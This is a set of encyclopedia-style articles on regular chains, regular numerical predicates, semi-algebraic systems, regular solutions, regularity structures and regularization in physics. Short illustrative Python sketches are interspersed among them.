The variables in the polynomial ring R = k [ x 1 , … , x n ] {\displaystyle R=k[x_{1},\ldots ,x_{n}]}
are always sorted as x 1 < ⋯ < x n .
A non-constant polynomial f in R {\displaystyle R} can be seen as a univariate polynomial in its greatest variable.
The greatest variable in f is called its main variable, denoted by mvar ( f ). Let u be the main variable of f and write it as f = a e u e + ⋯ + a 1 u + a 0 , {\displaystyle f=a_{e}u^{e}+\cdots +a_{1}u+a_{0},}
where e is the degree of f with respect to u and a e {\displaystyle a_{e}} is the leading coefficient of f with respect to u . Then the initial of f is a e {\displaystyle a_{e}} and e is its main degree.
A non-empty subset T of R {\displaystyle R} is a triangular set, if the polynomials in T are non-constant and have distinct main variables. Hence, a triangular set is finite, and has cardinality at most n .
Let T = { t 1 , ..., t s } be a triangular set such that mvar ( t 1 ) < ⋯ < mvar ( t s ) , h i {\displaystyle h_{i}} be the initial of t i and h be the product of h i 's.
Then T is a regular chain if the iterated resultant of h with respect to T is nonzero, that is, if res ( … res ( res ( h , t s ) , t s − 1 ) , … , t 1 ) ≠ 0 , {\displaystyle \operatorname {res} (\ldots \operatorname {res} (\operatorname {res} (h,t_{s}),t_{s-1}),\ldots ,t_{1})\neq 0,}
where each resultant is computed with respect to the main variable of t i , respectively.
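As an illustration, the iterated-resultant test can be applied to the example given earlier. The following sketch uses SymPy; the resulting polynomial may differ by a sign or unit factor depending on the resultant convention, but it is nonzero, which is what the definition requires.

```python
from sympy import symbols, resultant

x1, x2, x3 = symbols('x1 x2 x3')

# The triangular set from the example, with variable order x1 < x2 < x3.
t1 = x2**2 - x1**2          # main variable x2, initial 1
t2 = x2*x3 - x1*x2          # main variable x3, initial x2

h = 1 * x2                  # product of the initials

# Iterated resultant of h with respect to T, eliminating main variables
# from the largest one down to the smallest.
r = resultant(h, t2, x3)    # eliminate x3 (h does not involve x3, so this is a power of x2)
r = resultant(r, t1, x2)    # eliminate x2
print(r)                    # a nonzero polynomial in x1, so T is a regular chain
```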
This definition is from Yang and Zhang, which is of much algorithmic flavor.
The quasi-component W ( T ) described by the regular chain T is W ( T ) = V ( T ) ∖ V ( h ) , {\displaystyle W(T)=V(T)\setminus V(h),}
the set difference of the varieties V ( T ) and V ( h ).
The attached algebraic object of a regular chain is its saturated ideal sat ( T ) = ( T ) : h ∞ . {\displaystyle \operatorname {sat} (T)=(T):h^{\infty }.}
A classic result is that the Zariski closure of W ( T ) equals the variety defined by sat( T ), that is, W ( T ) ¯ = V ( sat ( T ) ) , {\displaystyle {\overline {W(T)}}=V(\operatorname {sat} (T)),}
and its dimension is n − | T |, the difference of the number of variables and the number of polynomials in T .
In general, there are two ways to decompose a polynomial system F . The first one is to decompose lazily, that is, only to represent its generic points in the (Kalkbrener) sense, V ( F ) = ⋃ i = 1 e W ( T i ) ¯ . {\displaystyle V(F)=\bigcup _{i=1}^{e}{\overline {W(T_{i})}}.}
The second is to describe all zeroes in the Lazard sense, V ( F ) = ⋃ i = 1 e W ( T i ) . {\displaystyle V(F)=\bigcup _{i=1}^{e}W(T_{i}).}
There are various algorithms available for triangular decompositions in either sense.
Let T be a regular chain in the polynomial ring R . | https://en.wikipedia.org/wiki/Regular_chain |
In computer science and mathematics , more precisely in automata theory , model theory and formal language , a regular numerical predicate is a kind of relation over integers. Regular numerical predicates can also be considered as a subset of N r {\displaystyle \mathbb {N} ^{r}} for some arity r {\displaystyle r} . One of the main interests of this class of predicates is that it can be defined in plenty of different ways, using different logical formalisms. Furthermore, most of the definitions use only basic notions, and thus allows to relate foundations of various fields of fundamental computer science such as automata theory , syntactic semigroup , model theory and semigroup theory .
The class of regular numerical predicate is denoted C l c a {\displaystyle {\mathcal {C}}_{lca}} , [ 1 ] : 140 N t h r e s , m o d {\displaystyle {\mathcal {N}}_{\mathtt {thres,mod}}} [ 2 ] and REG. [ 3 ]
The class of regular numerical predicate admits a lot of equivalent definitions. They are now given. In all of those definitions, we fix r ∈ N {\displaystyle r\in \mathbb {N} } and P ⊆ N r {\displaystyle P\subseteq \mathbb {N} ^{r}} a (numerical) predicate of arity r {\displaystyle r} .
The first definition encodes predicate as a formal language . A predicate is said to be regular if the formal language is regular . [ 3 ] : 25
Let the alphabet A {\displaystyle A} be the set of subsets of { 0 , … , r − 1 } {\displaystyle \{0,\dots ,r-1\}} . Given a vector of r {\displaystyle r} integers n = ( n 0 , … , n r − 1 ) ∈ N r {\displaystyle \mathbf {n} =(n_{0},\dots ,n_{r-1})\in \mathbb {N} ^{r}} , it is represented by the word n ¯ {\displaystyle {\overline {\mathbf {n} }}} of length max ( n 0 , … , n r − 1 ) + 1 {\displaystyle \max(n_{0},\dots ,n_{r-1})+1} whose i {\displaystyle i} -th letter, for i = 0 , … , max ( n 0 , … , n r − 1 ) {\displaystyle i=0,\dots ,\max(n_{0},\dots ,n_{r-1})} , is { j ∣ n j = i } {\displaystyle \{j\mid n_{j}=i\}} . For example, the vector ( 3 , 1 , 3 ) {\displaystyle (3,1,3)} is represented by the word ∅ { 1 } ∅ { 0 , 2 } {\displaystyle \emptyset \{1\}\emptyset \{0,2\}} .
We then define P ¯ {\displaystyle {\overline {P}}} as { n ¯ ∣ n } {\displaystyle \{{\overline {\mathbf {n} }}\mid \mathbf {n} \}} .
The numerical predicate P {\displaystyle P} is said to be regular if P ¯ {\displaystyle {\overline {P}}} is a regular language over the alphabet A {\displaystyle A} . This is the reason for the use of the word "regular" to describe this kind of numerical predicate.
This second definition is similar to the previous one. Predicates are encoded into languages in a different way, and the predicate is said to be regular if and only if the language is regular. [ 3 ] : 25
Our alphabet A {\displaystyle A} is the set of vectors of r {\displaystyle r} binary digits. That is: { 0 , 1 } r {\displaystyle \{0,1\}^{r}} . Before explaining how to encode a vector of numbers, we explain how to encode a single number.
Given a length l {\displaystyle l} and a number n ≤ l {\displaystyle n\leq l} , the unary representation of n {\displaystyle n} of length l {\displaystyle l} is the word ∣ n ∣ l {\displaystyle \mid {n}\mid _{l}} over the binary alphabet { 0 , 1 } {\displaystyle \{0,1\}} , beginning with a sequence of n {\displaystyle n} "1"'s, followed by l − n "0"'s. For example, the unary representation of 1 of length 4 is 1000 {\displaystyle 1000} .
Given a vector of r {\displaystyle r} integers n = ( n 0 , … , n r − 1 ) ∈ N r {\displaystyle \mathbf {n} =(n_{0},\dots ,n_{r-1})\in \mathbb {N} ^{r}} , let l = max ( n 0 , … , n r − 1 ) {\displaystyle l=\max(n_{0},\dots ,n_{r-1})} . The vector n {\displaystyle \mathbf {n} } is represented by the word n ¯ ∈ ( { 0 , 1 } r ) ∗ {\displaystyle {\overline {\mathbf {n} }}\in \left(\{0,1\}^{r}\right)^{*}} such that the projection of n ¯ {\displaystyle {\overline {\mathbf {n} }}} over its i {\displaystyle i} -th component is ∣ n i ∣ max ( n 0 , … , n r − 1 ) {\displaystyle \mid {n_{i}}\mid _{\max(n_{0},\dots ,n_{r-1})}} . For example, the representation of ( 3 , 1 , 3 ) {\displaystyle (3,1,3)} is 1 1 1 1 0 0 1 1 1 {\displaystyle {\begin{array}{l|l|l}1&1&1\\1&0&0\\1&1&1\end{array}}} . This is a word whose letters are the vectors ( 1 , 1 , 1 ) {\displaystyle (1,1,1)} , ( 1 , 0 , 1 ) {\displaystyle (1,0,1)} and ( 1 , 0 , 1 ) {\displaystyle (1,0,1)} and whose projections over the components are 111 {\displaystyle 111} , 100 {\displaystyle 100} and 111 {\displaystyle 111} respectively.
As in the previous definition, the numerical predicate P {\displaystyle P} is said to be regular if P ¯ {\displaystyle {\overline {P}}} is a regular language over the alphabet A {\displaystyle A} .
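The two encodings just described can be made concrete with a small Python sketch (an illustration, not part of the article; the function names are invented, and the set-based encoding follows the worked example ∅{1}∅{0,2}, indexing letters from 0 up to the maximum entry).

```python
def encode_as_sets(n):
    """First encoding: the letter at position i is the set of coordinates j
    with n[j] == i."""
    return [frozenset(j for j, nj in enumerate(n) if nj == i)
            for i in range(max(n) + 1)]

def encode_as_bitvectors(n):
    """Second encoding: the i-th letter stacks the i-th bits of the unary
    representations of the entries, giving a word over {0,1}^r."""
    return [tuple(1 if nj >= i else 0 for nj in n)
            for i in range(1, max(n) + 1)]

print(encode_as_sets((3, 1, 3)))
# [frozenset(), frozenset({1}), frozenset(), frozenset({0, 2})]
print(encode_as_bitvectors((3, 1, 3)))
# [(1, 1, 1), (1, 0, 1), (1, 0, 1)]
```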
A predicate is regular if and only if it can be defined by a monadic second order formula ϕ ( x 0 , … , x r − 1 ) {\displaystyle \phi (x_{0},\dots ,x_{r-1})} , or equivalently by an existential monadic second order formula, where the only atomic predicate is the successor function y + 1 = z {\displaystyle y+1=z} . [ 3 ] : 26
A predicate is regular if and only if it can be defined by a first order logic formula ϕ ( x 0 , … , x r − 1 ) {\displaystyle \phi (x_{0},\dots ,x_{r-1})} , where the atomic predicates are:
The language of congruence arithmetic [ 1 ] : 140 is defined as the set of Boolean combinations, where the atomic predicates are:
A predicate is regular if and only if it can be defined in the language of congruence arithmetic. The equivalence with previous definition is due to quantifier elimination . [ 4 ]
This definition requires a fixed parameter m {\displaystyle m} . A set is said to be regular if it is m {\displaystyle m} -regular for some m ≥ 2 {\displaystyle m\geq 2} .
In order to introduce the definition of m {\displaystyle m} -regular , the trivial case where r = 0 {\displaystyle r=0} should be considered separately. When r = 0 {\displaystyle r=0} , then the predicate P {\displaystyle P} is either the constant true or the constant false. Those two predicates are said to be m {\displaystyle m} -regular (for every m {\displaystyle m} ). Let us now assume that r ≥ 1 {\displaystyle r\geq 1} . In order to introduce the definition of regular predicate in this case, we need to introduce the notion of section of a predicate .
The section P x i = c {\displaystyle P^{x_{i}=c}} of P {\displaystyle P} is the predicate of arity r − 1 {\displaystyle r-1} where the i {\displaystyle i} -th component is fixed to c {\displaystyle c} . Formally, it is defined as { ( x 0 , … , x i − 1 , x i + 1 , … , x r − 1 ) ∣ P ( x 0 , … , x i − 1 , c , x i + 1 , … , x r − 1 ) } {\displaystyle \{(x_{0},\dots ,x_{i-1},x_{i+1},\dots ,x_{r-1})\mid P(x_{0},\dots ,x_{i-1},c,x_{i+1},\dots ,x_{r-1})\}} . For example, let us consider the sum predicate S = { ( n 0 , n 1 , n 2 ) ∣ n 0 + n 1 = n 2 } {\displaystyle S=\{(n_{0},n_{1},n_{2})\mid n_{0}+n_{1}=n_{2}\}} . Then S x 0 = c = { ( n 1 , n 2 ) ∣ c + n 1 = n 2 } {\displaystyle S^{x_{0}=c}=\{(n_{1},n_{2})\mid c+n_{1}=n_{2}\}} is the predicate which adds the constant c {\displaystyle c} , and S x 2 = c = { ( n 0 , n 1 ) ∣ n 0 + n 1 = c } {\displaystyle S^{x_{2}=c}=\{(n_{0},n_{1})\mid n_{0}+n_{1}=c\}} is the predicate which states that the sum of its two elements is c {\displaystyle c} .
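A section is easy to express in code; the short sketch below (with invented names, purely for illustration) fixes one argument of a predicate and applies it to the sum predicate used as an example above.

```python
def section(P, i, c):
    """Return the arity-(r-1) predicate obtained from P by fixing its i-th
    argument to the constant c."""
    def fixed(*args):
        args = list(args)
        args.insert(i, c)
        return P(*args)
    return fixed

S = lambda n0, n1, n2: n0 + n1 == n2        # the sum predicate

add_five  = section(S, 0, 5)                # (n1, n2) -> 5 + n1 == n2
sums_to_7 = section(S, 2, 7)                # (n0, n1) -> n0 + n1 == 7
print(add_five(2, 7), sums_to_7(3, 4))      # True True
```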
The last equivalent definition of regular predicate can now be given. A predicate P {\displaystyle P} of arity r ≥ 1 {\displaystyle r\geq 1} is m {\displaystyle m} -regular if it satisfies the two following conditions: [ 5 ]
The second property intuitively means that, when numbers are big enough, their exact values do not matter. The properties which matter are the order relation between the numbers and their values modulo the period m {\displaystyle m} .
Given a subset s ⊆ { 0 , … , r − 1 } {\displaystyle s\subseteq \{0,\dots ,r-1\}} , let s ¯ {\displaystyle {\overline {s}}} be the characteristic vector of s {\displaystyle s} . That is, the vector in { 0 , 1 } r {\displaystyle \{0,1\}^{r}} whose i {\displaystyle i} -th component is 1 if i ∈ s {\displaystyle i\in s} , and 0 otherwise. Given a sequence s = s 0 ⊊ ⋯ ⊊ s p − 1 {\displaystyle \mathbf {s} =s_{0}\subsetneq \dots \subsetneq s_{p-1}} of sets, let P s = { ( n 0 , … , n p − 1 ) ∈ N p ∣ P ( ∑ n i e i ) } {\displaystyle P_{\mathbf {s} }=\{(n_{0},\dots ,n_{p-1})\in \mathbb {N} ^{p}\mid P(\sum n_{i}e_{i})\}} , where e i {\displaystyle e_{i}} denotes the characteristic vector s i ¯ {\displaystyle {\overline {s_{i}}}} of s i {\displaystyle s_{i}} .
The predicate P {\displaystyle P} is regular if and only if for each increasing sequence of set s {\displaystyle \mathbf {s} } , P s {\displaystyle P_{\mathbf {s} }} is a recognizable submonoid of N p {\displaystyle \mathbb {N} ^{p}} . [ 2 ]
The predicate P {\displaystyle P} is regular if and only if all languages which can be defined in first order logic with atomic predicates for letters and the atomic predicate P {\displaystyle P} are regular. The same property also holds for monadic second order logic, and for logic with modular quantifiers. [ 1 ]
The following property allows one to reduce an arbitrarily complex non-regular predicate to a simpler binary predicate which is also non-regular. [ 5 ]
Let us assume that P {\displaystyle P} is definable in Presburger Arithmetic. The predicate P {\displaystyle P} is not regular if and only if there exists a formula in F O [ ≤ , R ] {\displaystyle \mathbf {FO} [\leq ,R]} which defines the multiplication by a rational p q ∉ { 0 , 1 } {\displaystyle {\frac {p}{q}}\not \in \{0,1\}} . More precisely, it allows one to define the non-regular predicate { ( p × n , q × n ) ∣ n ∈ N } {\displaystyle \{(p\times n,q\times n)\mid n\in \mathbb {N} \}} for some p ∉ { 0 , q } {\displaystyle p\not \in \{0,q\}} .
The class of regular numerical predicates satisfies many properties.
As in previous case, let us assume that P {\displaystyle P} is definable in Presburger Arithmetic. The satisfiability of ∃ M S O ( + 1 , P ) {\displaystyle \exists \mathbf {MSO} (+1,P)} is decidable if and only if P {\displaystyle P} is regular.
This theorem is due to the previous property and the fact that the satisfiability of ∃ M S O ( + 1 , × p q ) {\displaystyle \exists \mathbf {MSO} (+1,\times {\frac {p}{q}})} is undecidable when p ≠ 0 {\displaystyle p\neq 0} and p ≠ q {\displaystyle p\neq q} . [ citation needed ]
The class of regular predicates is closed under union, intersection, complement, taking a section, projection and Cartesian product. All of those properties follow directly from the definition of this class as the class of predicates definable in F O ( ≤ , mod ) {\displaystyle \mathbf {FO} (\leq ,\mod )} . [ citation needed ]
It is decidable whether a predicate defined in Presburger arithmetic is regular. [ 2 ]
The logic F O ( ≤ , + c , mod ) {\displaystyle \mathbf {FO} (\leq ,+c,\mod )} considered above admits quantifier elimination. More precisely, the algorithm for quantifier elimination by Cooper [ 6 ] introduces neither multiplications by constants nor sums of variables. Therefore, when applied to an F O ( ≤ , + c , mod ) {\displaystyle \mathbf {FO} (\leq ,+c,\mod )} formula, it returns a quantifier-free formula in F O ( ≤ , + c , mod ) {\displaystyle \mathbf {FO} (\leq ,+c,\mod )} . | https://en.wikipedia.org/wiki/Regular_numerical_predicate |
In computer algebra , a regular semi-algebraic system is a particular kind of triangular system of multivariate polynomials over a real closed field.
Regular chains and triangular decompositions are fundamental and well-developed tools for describing the complex solutions of polynomial systems. The notion of a regular semi-algebraic system is an adaptation of the concept of a regular chain focusing on solutions of the real analogue: semi-algebraic systems.
Any semi-algebraic system S {\displaystyle S} can be decomposed into finitely many regular semi-algebraic systems S 1 , … , S e {\displaystyle S_{1},\ldots ,S_{e}} such that a point (with real coordinates) is a solution of S {\displaystyle S} if and only if it is a solution of one of the systems S 1 , … , S e {\displaystyle S_{1},\ldots ,S_{e}} . [ 1 ]
Let T {\displaystyle T} be a regular chain of k [ x 1 , … , x n ] {\displaystyle \mathbf {k} [x_{1},\ldots ,x_{n}]} for some ordering of the variables x = x 1 , … , x n {\displaystyle \mathbf {x} =x_{1},\ldots ,x_{n}} and a real closed field k {\displaystyle \mathbf {k} } . Let u = u 1 , … , u d {\displaystyle \mathbf {u} =u_{1},\ldots ,u_{d}} and y = y 1 , … , y n − d {\displaystyle \mathbf {y} =y_{1},\ldots ,y_{n-d}} designate respectively the variables of x {\displaystyle \mathbf {x} } that are free and algebraic with respect to T {\displaystyle T} . Let P ⊂ k [ x ] {\displaystyle P\subset \mathbf {k} [\mathbf {x} ]} be finite such that each polynomial in P {\displaystyle P} is regular with respect to the saturated ideal of T {\displaystyle T} . Define P > := { p > 0 ∣ p ∈ P } {\displaystyle P_{>}:=\{p>0\mid p\in P\}} . Let Q {\displaystyle {\mathcal {Q}}} be a quantifier-free formula of k [ x ] {\displaystyle \mathbf {k} [\mathbf {x} ]} involving only the variables of u {\displaystyle \mathbf {u} } . We say that R := [ Q , T , P > ] {\displaystyle R:=[{\mathcal {Q}},T,P_{>}]} is a regular semi-algebraic system if the following three conditions hold.
The zero set of R {\displaystyle R} , denoted by Z k ( R ) {\displaystyle Z_{\mathbf {k} }(R)} , is defined as the set of points ( u , y ) ∈ k d × k n − d {\displaystyle (u,y)\in \mathbf {k} ^{d}\times \mathbf {k} ^{n-d}} such that Q ( u ) {\displaystyle {\mathcal {Q}}(u)} is true and t ( u , y ) = 0 , p ( u , y ) > 0 {\displaystyle t(u,y)=0,p(u,y)>0} , for all t ∈ T {\displaystyle t\in T} and all p ∈ P {\displaystyle p\in P} . Observe that Z k ( R ) {\displaystyle Z_{\mathbf {k} }(R)} has dimension d {\displaystyle d} in the affine space k n {\displaystyle \mathbf {k} ^{n}} .
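The membership condition defining the zero set can be checked very directly. The sketch below is purely illustrative (the toy system, the numerical tolerance and all names are assumptions, not taken from the article): it tests the three conditions for Q : u > 0, T = { y² − u } and P = { y }.

```python
Q = lambda u: u > 0                  # quantifier-free condition on the free variable u
T = [lambda u, y: y**2 - u]          # polynomials of the regular chain, as residuals
P = [lambda u, y: y]                 # polynomials required to be strictly positive

def in_zero_set(u, y, tol=1e-9):
    return (Q(u)
            and all(abs(t(u, y)) < tol for t in T)
            and all(p(u, y) > 0 for p in P))

print(in_zero_set(4.0, 2.0))    # True:  y = +sqrt(u) and y > 0
print(in_zero_set(4.0, -2.0))   # False: fails y > 0
print(in_zero_set(-1.0, 1.0))   # False: fails Q
```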
| https://en.wikipedia.org/wiki/Regular_semi-algebraic_system |
In chemistry , a regular solution is a solution whose entropy of mixing is equal to that of an ideal solution with the same composition, but is non-ideal due to a nonzero enthalpy of mixing . [ 1 ] [ 2 ] Such a solution is formed by random mixing of components of similar molar volume and without strong specific interactions, [ 1 ] [ 2 ] and its behavior diverges from that of an ideal solution by showing phase separation at intermediate compositions and temperatures (a miscibility gap ). [ 3 ] For two components, the entropy of mixing is Δ S m i x = − n R ( x 1 ln x 1 + x 2 ln x 2 ) , {\displaystyle \Delta S_{mix}=-nR(x_{1}\ln x_{1}+x_{2}\ln x_{2}),}
where R {\displaystyle R\,} is the gas constant , n {\displaystyle n\,} the total number of moles , and x i {\displaystyle x_{i}\,} the mole fraction of each component. Only the enthalpy of mixing is non-zero, unlike for an ideal solution, while the volume of the solution equals the sum of volumes of components.
A regular solution can also be described by Raoult's law modified with a Margules function with only one parameter α {\displaystyle \alpha } : P 1 = x 1 f 1 , M P 1 o , P 2 = x 2 f 2 , M P 2 o , {\displaystyle P_{1}=x_{1}f_{1,M}P_{1}^{o},\qquad P_{2}=x_{2}f_{2,M}P_{2}^{o},}
where the Margules function is f 1 , M = e α x 2 2 , f 2 , M = e α x 1 2 , {\displaystyle f_{1,M}=e^{\alpha x_{2}^{2}},\qquad f_{2,M}=e^{\alpha x_{1}^{2}},} and P i o {\displaystyle P_{i}^{o}} denotes the vapor pressure of pure component i {\displaystyle i} .
Notice that the Margules function for each component contains the mole fraction of the other component. It can also be shown using the Gibbs–Duhem relation that if the first Margules expression holds, then the other one must have the same shape. A regular solution's internal energy varies during the mixing process.
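A quick symbolic check of this Gibbs–Duhem consistency, assuming the one-parameter Margules form ln γ₁ = αx₂² and ln γ₂ = αx₁² given above (a sketch, not part of the original text):

```python
import sympy as sp

x1, alpha = sp.symbols('x1 alpha')
x2 = 1 - x1
ln_g1 = alpha * x2**2          # assumed Margules form for component 1
ln_g2 = alpha * x1**2          # assumed Margules form for component 2

# Gibbs-Duhem at constant T and P: x1 d(ln g1)/dx1 + x2 d(ln g2)/dx1 = 0
gibbs_duhem = sp.simplify(x1 * sp.diff(ln_g1, x1) + x2 * sp.diff(ln_g2, x1))
print(gibbs_duhem)   # 0
```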
The value of α {\displaystyle \alpha } can be interpreted as W/RT , where W = 2 U 12 - U 11 - U 22 represents the difference in interaction energy between like and unlike neighbors.
In contrast to ideal solutions, regular solutions do possess a non-zero enthalpy of mixing, due to the W term. If the unlike interactions are more unfavorable than the like ones, we get competition between an entropy of mixing term that produces a minimum in the Gibbs free energy at x 1 = 0.5 and the enthalpy term that has a maximum there. At high temperatures, the entropic term in the free energy of mixing dominates and the system is fully miscible, but at lower temperatures the G ( x 1 ) curve will have two minima and a maximum in between. This results in phase separation. In general there will be a temperature where the three extremes coalesce and the system becomes fully miscible. This point is known as the upper critical solution temperature or the upper consolute temperature.
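This competition is easy to see numerically. The following sketch (an illustration only, not from the source) evaluates the molar Gibbs free energy of mixing in units of RT, g(x₁) = x₁ ln x₁ + x₂ ln x₂ + αx₁x₂, and counts its interior minima: a single minimum appears for α below the critical value 2, and two minima (a miscibility gap) for larger α.

```python
import numpy as np

def g_mix(x, alpha):
    # molar Gibbs free energy of mixing, in units of RT
    return x * np.log(x) + (1 - x) * np.log(1 - x) + alpha * x * (1 - x)

x = np.linspace(1e-4, 1 - 1e-4, 2001)
for alpha in (1.5, 3.0):
    g = g_mix(x, alpha)
    # interior local minima of the sampled curve
    minima = x[1:-1][(g[1:-1] < g[:-2]) & (g[1:-1] < g[2:])]
    print(f"alpha = {alpha}: {len(minima)} minimum/minima near x = {np.round(minima, 3)}")
# alpha = 1.5 (below the critical value 2) gives a single minimum at x = 0.5;
# alpha = 3.0 gives two minima, i.e. a miscibility gap.
```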
In contrast to ideal solutions, the volumes in the case of regular solutions are no longer strictly additive but must be calculated from partial molar volumes that are a function of x 1 .
The term was introduced in 1927 by the American physical chemist Joel Henry Hildebrand . [ 4 ] | https://en.wikipedia.org/wiki/Regular_solution |
Martin Hairer 's theory of regularity structures provides a framework for studying a large class of subcritical parabolic stochastic partial differential equations arising from quantum field theory . [ 1 ] The framework covers the Kardar–Parisi–Zhang equation , the Φ 3 4 {\displaystyle \Phi _{3}^{4}} equation and the parabolic Anderson model, all of which require renormalization in order to have a well-defined notion of solution.
A key advantage of regularity structures over previous methods is the ability to pose the solution of singular non-linear stochastic equations in terms of fixed-point arguments in a space of “controlled distributions” over a fixed regularity structure. The space of controlled distributions lives in an analytical/algebraic space that is constructed to encode key properties of the equations at hand. As in many similar approaches, the existence of this fixed point is first posed as a similar problem where the noise term is regularised. Subsequently, the regularisation is removed as a limit process. A key difficulty in these problems is to show that stochastic objects associated to these equations converge as this regularisation is removed.
Hairer won the 2021 Breakthrough Prize in mathematics for introducing regularity structures. [ 2 ]
A regularity structure is a triple T = ( A , T , G ) {\displaystyle {\mathcal {T}}=(A,T,G)} consisting of:
A further key notion in the theory of regularity structures is that of a model for a regularity structure, which is a concrete way of associating to any τ ∈ T {\displaystyle \tau \in T} and x 0 ∈ R d {\displaystyle x_{0}\in \mathbb {R} ^{d}} a "Taylor polynomial" based at x 0 {\displaystyle x_{0}} and represented by τ {\displaystyle \tau } , subject to some consistency requirements.
More precisely, a model for T = ( A , T , G ) {\displaystyle {\mathcal {T}}=(A,T,G)} on R d {\displaystyle \mathbb {R} ^{d}} , with d ≥ 1 {\displaystyle d\geq 1} consists of two maps
Thus, Π {\displaystyle \Pi } assigns to each point x {\displaystyle x} a linear map Π x {\displaystyle \Pi _{x}} , which is a linear map from T {\displaystyle T} into the space of distributions on R d {\displaystyle \mathbb {R} ^{d}} ; Γ {\displaystyle \Gamma } assigns to any two points x {\displaystyle x} and y {\displaystyle y} a bounded operator Γ x y {\displaystyle \Gamma _{xy}} , which has the role of converting an expansion based at y {\displaystyle y} into one based at x {\displaystyle x} . These maps Π {\displaystyle \Pi } and Γ {\displaystyle \Gamma } are required to satisfy the algebraic conditions
and the analytic conditions that, given any r > | inf A | {\displaystyle r>|\inf A|} , any compact set K ⊂ R d {\displaystyle K\subset \mathbb {R} ^{d}} , and any γ > 0 {\displaystyle \gamma >0} , there exists a constant C > 0 {\displaystyle C>0} such that the bounds
hold uniformly for all r {\displaystyle r} -times continuously differentiable test functions φ : R d → R {\displaystyle \varphi \colon \mathbb {R} ^{d}\to \mathbb {R} } with unit C r {\displaystyle {\mathcal {C}}^{r}} norm, supported in the unit ball about the origin in R d {\displaystyle \mathbb {R} ^{d}} , for all points x , y ∈ K {\displaystyle x,y\in K} , all 0 < λ ≤ 1 {\displaystyle 0<\lambda \leq 1} , and all τ ∈ T α {\displaystyle \tau \in T_{\alpha }} with β < α ≤ γ {\displaystyle \beta <\alpha \leq \gamma } . Here φ x λ : R d → R {\displaystyle \varphi _{x}^{\lambda }\colon \mathbb {R} ^{d}\to \mathbb {R} } denotes the shifted and scaled version of φ {\displaystyle \varphi } given by
| https://en.wikipedia.org/wiki/Regularity_structure |
In physics , especially quantum field theory , regularization is a method of modifying observables which have singularities in order to make them finite by the introduction of a suitable parameter called the regulator . The regulator, also known as a "cutoff", models our lack of knowledge about physics at unobserved scales (e.g. scales of small size or large energy levels). It compensates for (and requires) the possibility of a separation of scales: "new physics" may be discovered at the scales which the present theory is unable to model, while the current theory can still give accurate predictions as an "effective theory" within its intended scale of use.
It is distinct from renormalization , another technique to control infinities without assuming new physics, by adjusting for self-interaction feedback.
Regularization was for many decades controversial even amongst its inventors, as it combines physical and epistemological claims into the same equations. However, it is now well understood and has proven to yield useful, accurate predictions.
Regularization procedures deal with infinite, divergent, and nonsensical expressions by introducing an auxiliary concept of a regulator (for example, the minimal distance ϵ {\displaystyle \epsilon } in space which is useful, in case the divergences arise from short-distance physical effects). The correct physical result is obtained in the limit in which the regulator goes away (in our example, ϵ → 0 {\displaystyle \epsilon \to 0} ), but the virtue of the regulator is that for its finite value, the result is finite.
However, the result usually includes terms proportional to expressions like 1 / ϵ {\displaystyle 1/\epsilon } which are not well-defined in the limit ϵ → 0 {\displaystyle \epsilon \to 0} . Regularization is the first step towards obtaining a completely finite and meaningful result; in quantum field theory it must be usually followed by a related, but independent technique called renormalization . Renormalization is based on the requirement that some physical quantities — expressed by seemingly divergent expressions such as 1 / ϵ {\displaystyle 1/\epsilon } — are equal to the observed values. Such a constraint allows one to calculate a finite value for many other quantities that looked divergent.
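A toy example (not tied to any particular field theory) of how a regulator turns a divergent expression into a finite but regulator-dependent one: the integral of 1/x² down to x = 0 diverges, but cutting it off at a minimal distance ε gives a finite result containing a 1/ε term, which diverges again as the regulator is removed.

```python
import sympy as sp

x, eps = sp.symbols('x epsilon', positive=True)

regulated = sp.integrate(1 / x**2, (x, eps, 1))   # finite for any epsilon > 0
print(regulated)                                  # -1 + 1/epsilon
print(sp.limit(regulated, eps, 0, '+'))           # oo: the divergence returns as epsilon -> 0
```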
The existence of a limit as ε goes to zero and the independence of the final result from the regulator are nontrivial facts. The underlying reason for them lies in universality as shown by Kenneth Wilson and Leo Kadanoff and the existence of a second order phase transition . Sometimes, taking the limit as ε goes to zero is not possible. This is the case when we have a Landau pole and for nonrenormalizable couplings like the Fermi interaction . However, even for these two examples, if the regulator only gives reasonable results for ϵ ≫ ℏ c / Λ {\displaystyle \epsilon \gg \hbar c/\Lambda } (where Λ {\displaystyle \Lambda } is an upper energy cutoff) and we are working with scales of the order of ℏ c / Λ ′ {\displaystyle \hbar c/\Lambda '} , regulators with ℏ c / Λ ≪ ϵ ≪ ℏ c / Λ ′ {\displaystyle \hbar c/\Lambda \ll \epsilon \ll \hbar c/\Lambda '} still give accurate approximations. The physical reason why we can't take the limit of ε going to zero is the existence of new physics below Λ.
It is not always possible to define a regularization such that the limit of ε going to zero is independent of the regularization. In this case, one says that the theory contains an anomaly . Anomalous theories have been studied in great detail and are often founded on the celebrated Atiyah–Singer index theorem or variations thereof (see, for example, the chiral anomaly ).
The problem of infinities first arose in the classical electrodynamics of point particles in the 19th and early 20th century.
The mass of a charged particle should include the mass–energy in its electrostatic field ( electromagnetic mass ). Assume that the particle is a charged spherical shell of radius r e . The mass–energy in the field is
which becomes infinite as r e → 0 . This implies that the point particle would have infinite inertia , making it unable to be accelerated. Incidentally, the value of r e that makes m e m {\displaystyle m_{\mathrm {em} }} equal to the electron mass is called the classical electron radius , which (setting q = e {\displaystyle q=e} and restoring factors of c and ε 0 {\displaystyle \varepsilon _{0}} ) turns out to be
where α ≈ 1 / 137.040 {\displaystyle \alpha \approx 1/137.040} is the fine-structure constant , and ℏ / m e c {\displaystyle \hbar /m_{\mathrm {e} }c} is the Compton wavelength of the electron.
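A quick numerical check of the quoted expression (an illustration; the constants are standard rounded values, with α taken as 1/137.04 as in the text):

```python
hbar  = 1.054571817e-34    # J*s, reduced Planck constant
m_e   = 9.1093837015e-31   # kg, electron mass
c     = 2.99792458e8       # m/s, speed of light
alpha = 1 / 137.04         # fine-structure constant (rounded as in the text)

r_e = alpha * hbar / (m_e * c)
print(f"classical electron radius r_e = {r_e:.3e} m")   # roughly 2.818e-15 m
```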
